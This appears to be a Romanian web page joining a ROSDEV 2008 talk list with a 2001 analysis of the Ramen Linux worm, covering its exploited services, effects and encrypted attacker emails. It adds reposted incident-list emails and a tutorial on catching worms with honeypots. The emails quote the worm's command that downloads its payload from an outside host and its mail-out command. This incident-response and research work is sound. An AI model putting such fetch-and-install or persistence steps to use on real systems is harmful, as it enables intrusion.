• Ramona Modroiu – Deschidere ROSDEV_2008

• Razvan Rughinis – Open Source in Mediul Academic. Partea 1

• Razvan Rughinis – Open Source in Mediul Academic. Partea 2

• Mihai Jalobeanu – Linux si Mediile Virtuale de Instruire

• Bogdan Radulescu – Distributia Linux Nimblex

• Liviu Andreicut – Sisteme monitorizare video / administrare centralizata servere

• Zoltan Orban – AbelCRM

• Zsolt Bodi – Code Igniter

• Virgi Adrian Teaca – DARKSTAR Part 1

• Virgi Adrian Teaca – DARKSTAR Part 2

• Daniel Constantin Mierla – Open Source si VoIP

• Cosmin Elefterescu – Platforma VoIP Open Source in Campusul Universitar

• Catalin Balan – OForge

• Craciun Attila – Bluewhite64

• Razvan Deaconescu – ROSEdu

• Marian Banica – Open Source for Higher Education

• Iulian Nicu Serbanoiu – Generator Minimal de Voce

• Angelescu Ovidiu – RoFreeSBIE

Ramen Worm - General Details
==============================

1. Is this realy a worm ?
Yes it is .
2. Why ?
It has multiplication ability and it does not infect executables file in order
to multiplicate so it can not be considered a Virus .
3. Multiplication technique :
It will scan whole networks ( random B class networks XXX.XXX.0.0/255.255.0.0 in order find vulnerable systems.
Once a vulnerable system is found it will take control of it ( the worm will have root access on compromised machine) ,
copy itself to the target , and start scanning .

4. Vulnerabilities exploited by the worm
wu-ftpd version 2.6.0
LPRng format vulnerability
rpc.statd    vulnerability

5. Systems Affected
Strings found in the worm indicates that the following systems are targeted :
Redhat 6.0 - (knfsd-1.2.2-4)
Redhat 6.1 - (knfsd-1.4.7-7)
Redhat 6.2 - (nfs-utils-0.1.6-2)
RedHat 7.0 - Guinesss-dev
RedHat 7.0 - Guinesss
but can be affected any other linux running wu-ftpd 2.6.0 or rpc.statd

6.   Systems that are not affected
Win 9x , Win NT , Win 2000
Non X86 Unixes.

7. Worm effects
a) Once a system is compromised the worm will find and replace any index.html file with one file carried inside worm .
b) it will disable on compromised machine FTP anonymous access to the machine ( my oppinion this is a "bug" in the worm )
c) it will disable and erase rpc.statd from the compromised machine
d) it will disable and erase lpd deamon from the compromised machine so any printing on that machine will be impossibe .
e) it will modify inetd.conf on RedHat 6.x and xinetd.conf on RedHat 7.0 and install a fake webserver
on a non standard port (my oppinion it can contain also a buffer overflow exploitable
remotely. But i could't prove that yet). By installing this it allows the spread of the worm.
f) it will remove /etc/hosts.deny
g) it will modify /etc/rc.d/rc.sysinit allowing the worm to be started each time machine is rebooted .
h) it will send mail to the following addreses ( this 2 mail addreses and a password "bl3h" were encrypted in the worm )
   gb31337@hotmail.com
   gb31337@yahoo.com
i) Once worm starts scanning it will consume a large amount of your internet bandwidth. The scanning is verry fast due to
usage of synscan technique .
j) Once the system is rebooted it will restart scanning .

8. Spreading
The worm is spreading very fast due to his very fast Class B network scanning technique . On our network (10 Mb / sec)
the hub was in limitation and the whole bandwidth was consummed. It scanned 2 "B classes" in 15 minutes.

9. Danger
The worm itself seemns is dangerous due to network bandwith consumation , and due to posibility ( not proved yet ) of
remote accessing the compromised box by the worm author.

10. Percentage of boxes vulnerable
There are many boxes vulnerable. It is quite common that Redhat 6.2 or Redhat 7.0 to be installed "standard" making
them vulnerable to this worm. My estimation is that in a class B network worm will find at least 10-20 vulnerable boxes.

My Original postings to BugTraq:
================================

=================================================================================
=================================================================================

Subject:
  sunrpc / wu-ftpd worm ?
Date:
  Mon, 15 Jan 2001 22:41:50 +0200
From:
  Mihai Moldovanu mihaim AT PROFM dot RO
Organization:
  Radio ProFM
To:
  INCIDENTS at SECURITYFOCUS DOT COM
References:
  1

Cristian Dumitrescu wrote:

> Hey
> I've been experiencing the same kind of scans in the last 2 weeks, with
> increased density in the last days, from these ip addreses:
>
> 211.120.63.136
> 213.154.132.122
> 210.205.6.215
> 24.114.48.24
> 62.83.125.82
> 193.231.199.4
> 193.40.223.66
> 65.3.3.83
> 193.230.227.234
> > 24.26.121.156
> > 24.168.66.119
> > 64.31.226.156
> > 142.169.227.102
> > 193.226.15.15
> > 211.218.144.11

Same problems here :
38.232.191.200
24.169.70.243
194.102.254.118
63.146.209.50

But the most interesting is :
130.111.148.69 wich seems to be a worm launcher site .
It will connect to the taget machine on 111 or 21 and will exploit the well
known
rpc.statd and wu-ftp 2.6.0 bug to
gain root on the remote machine.

The tar itself is downloaded from the that machine on port 27374 .

" lynx -source http://%s:27374 > /usr/src/.poop/ramen.tgz "

After a succesfull install it seems it will send a mail with the command :
" echo Eat Your Ramen! | mail -s % % " to some obscure hotmail.com account .

It seems that it has some sort of class B scanner and exploits for rpc.statd and
wu-ftpd

If anyone is interested in taking a deeper look in it mail me and i will send
the
.tgz  or you can get it from the site i mentioned above.

Best Regards,

--
Lead programmer,
Mihai Moldovanu (mihaim at profm dot ro)
WEB:    http://tfm.profm.ro/

http://www.slashdot.ro/

=================================================================================
=================================================================================

Subject:
  Re: anyone else seen an increase in sunrpc scans these days?
Date:
  Mon, 15 Jan 2001 14:40:16 +0200
From:
  Mihai Moldovanu mihaim at profm dot ro
Organization:
  Radio ProFM
To:
  INCIDENTS at SECURITYFOCUS dot COM
References:
  1

Jason Lewis wrote:

> I couldn't find any of those addresses, but I have similar scans in my logs.
>
> 63.91.6.36
> 64.32.209.213
> 64.21.114.2
> 66.22.62.2
> 216.98.160.251

Yes . The same problem here . But not only 111 . 21 also.
We deployed a honnypot and waited to be compromised. It took 12 hours to be
compromised. I took it out of the network
and this is what i found on it :
It seemns like a worm that installs StatDXscan  ( Class B rpc.statd scanner) ,
wu-ftpd scanner , a modified t0rn rootkit along with Adore LKM rootkit , and
flood
tools : Sl2 , smurf5 , tojaned sshd running on port 48480 )
t0rnscan  has inside it the following string:  irc.webbernet.net:6667

--
Lead programmer,
Mihai Moldovanu (mihaim at profm dot ro)
WEB:    http://tfm.profm.ro/

http://www.developers.ro/

=================================================================================
=================================================================================
Subject:
  Ramen worm . More details on it. ( found a password and e-mails crypted inside it)
Date:
  Tue, 16 Jan 2001 22:19:30 +0200
From:
  Mihai Moldovanu mihaim at profm dot ro
Organization:
  Radio ProFM
To:
  INCIDENTS at SECURITYFOCUS dot COM
References:
  1

I completed reverse engineering the ramen worm. There are 3 crypted text
messages in the worm :
2 are email addresses :
Decrypted: "gb31337@hotmail.com" ,  in executable ->  "fa20226?gnsl`hk-bnl"
Decrypted: "gb31337@yahoo.com" ,   in executable ->  "fa20226?x`gnn-bnl"
and a crypted password :
Decrypted "bl3h"  ,   in executable -> "ak2g"
This texts can be found in almost all ELF worm executables.
Crypting algorithm is verry easy.

For each characted in crypted text add 1 and you will obtain the plain text
i used the following C code to decrypt :

for (i= 0 ;i < strlen(text) ;i++) a[i] = a[i] +1;

The asp executable ( the one wich get's installed in /sbin/asp and serve
requests on 27374 )  has a strange getline function coded wich
seems to be specialy crafted to allow remote upload / execution of code .
Unfortunately I can't prove that function have a buffer
overflow in it .

--
Lead programmer,
Mihai Moldovanu (mihaim at profm dot ro)
WEB:    http://www.tfm.ro

http://linux.tfm.ro

http://portal.tfm.ro

http://www.slashdot.ro

In primul rand ce este o rama de internet ?

O rima e un program care are capabilitatea de a se multiplica si de a se “muta” de pe un sistem pe altul folosind găuri de securitate in sistemele respective .

Studiul unei rime de internet poate fi fascinant însă de obicei ca sa studiezi o rima trebuie sa o ai … Iar ca sa o ai exista 2 posibilităţi :

• O downloadezi de pe diverse site-uri sau newsgrupuri …
• O prinzi singur

A doua posibilitate trebuie sa recunoaştem este mult mai interesanta.

Scule necesare

Un sistem honeypot si scule de analiza a executabilelor.

Cum se realizează un honeypot de prins rime

Având in vedere ca rimele sunt programe automate care scanează de obicei după nişte găuri de securitate fixe , probabilitatea de a prinde o rima pe honeypot este mult mai mare decit a prinde un blackhat .

Dar, având in vedere ca rimele nu poseda “inteligenta” si de regula nu au mecanisme de verificare de honeypot, problema se poate simplifica destul de mult . Se poate folosi de exemplu vmware + sistemul de operare dorit sau UML + linuxul dorit. Mare atenţie insa. O rima intrata in honeypot nu va sta prea mult pe gânduri si va începe sa atace alte sisteme. De aceea trebuie pus la punct FOARTE bine sistemul de control de trafic outgoing de pe honeypot. Daca aceste scripturi nu sunt puse bine la punct atunci riscul ca rima sa infecteze alte sisteme este mare si NU va doriţi ca o rima prinsa intr-un honeypot sa “fuga” in alta parte …

Odată toate scripturile făcute, honeypotul activ tot ce rămâne de făcut este sa aşteptaţi.

Presupunând ca honeypot-ul e infectat cu rima. Ce facem mai departe ? Acum intervine partea complicata si cea mai interesanta .

Analiza rimei

Partea de disecţie daca preferaţi termenul .

Pentru disecţie (reverse engineering) sint o gramada de scule ajutătoare. Informaţii detaliate cu privire la reverse engineering se găsesc , culmea ironiei , pe cel mai vechi si bun site de cracking (www.fravia.org). Acolo gasiti foarte multe informaţii utile despre principiile reverse engineering, how-to, tutoriale. Site-ul este in mare parte dedicat platformei windows dar principiile sint similare.

La data la care am inceput sa scriu la acest “articol” IDA nu era disponibila pentru linux (www.datarescue.com). news … ida e disponibila si pe linux. Este scula cea mai folosita pentru dezasamblarea unui executabil. Si este foarte folositoare in momentul in care vrei sa înţelegi ce se întâmplă in interiorul unui executabil atunci cind nu ai sursele de la executabil. IDA fiind aplicaţie de Win32 va fi nevoie de wine sau vmware pentru a fi rulată .

La capitolul debugers linuxul sta bine. Evident un debugger gen SoftIce ( pentru win32 ) eu nu am văzut pe linux. Dar se poate lucra relativ uşor cu gdb sau xgdb.

Restul de scule ajutătoare pentru analiza unei rime de obicei se fac la fata locului. Adică se programează. Sculele de baza pentru reverse engineering rămân totuşi: un dezasamblor , un debugger si multa multa răbdare .

Va urma.